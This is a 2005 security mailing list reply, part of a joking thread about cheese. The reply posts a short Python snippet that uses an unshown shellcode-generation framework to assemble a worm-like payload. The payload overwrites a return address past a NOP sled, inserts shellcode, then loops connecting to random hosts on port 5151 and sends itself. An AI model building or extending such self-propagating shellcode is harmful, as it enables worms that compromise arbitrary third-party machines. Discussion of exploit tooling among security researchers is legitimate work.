Dailydave mailing list archives

Re: Wormy cheese


From: Dave Aitel <dave () immunitysec com>
Date: Mon, 26 Sep 2005 12:32:22 -0400

It's one line posts like this that are both unfunny and have no interesting content one that get people's moderation flag turned on.

def main():
   nem=nem_linux_X86()
   print "calling addAttr"
   nem.addAttr("nem_prelude",None)
   nem.addAttr("nops",[5000])
   nem.addAttr("stroverwrite",["%27%83%04%08",1036])
   nem.addAttr("stroverwrite",[shellcodestring,1044])
   nem.addAttr("startloop",None)
   nem.addAttr("connect_random_host",[5151])
   nem.addAttr("sendall",None)
   nem.addAttr("closesock",None)
   nem.addAttr("endloop",None)
data=nem.get() <---this will autogenerate a function table, resolve addresses, etc. Having an assembler is nice...
   print "Length: %d"%len(data) <---around 250
   code=nem.getcode()
   print "Code follows"
   print code
   print "Code end"
   file("nem.shellcode","wb").write(data) #write it out
   print "Wrote %d bytes to file"%len(data)
-dave

Drsolly wrote:
On Mon, 26 Sep 2005, Eduardo Tongson wrote:

I've heard durian fruit is the analogous delicacy of our cheeses. Give
it a> try as an interim replacement... ;)
It's native here in southeast asia, but I have never thought of it as
analternative to cheese. btw the spiky king of fruits is more dangerous
thancheese because a falling big ripe durian can cause death (although
afalling coconut may too). <http://en.wikipedia.org/wiki/Durian> --ed

I guess you've never been hit by a falling Stilton.


Current thread: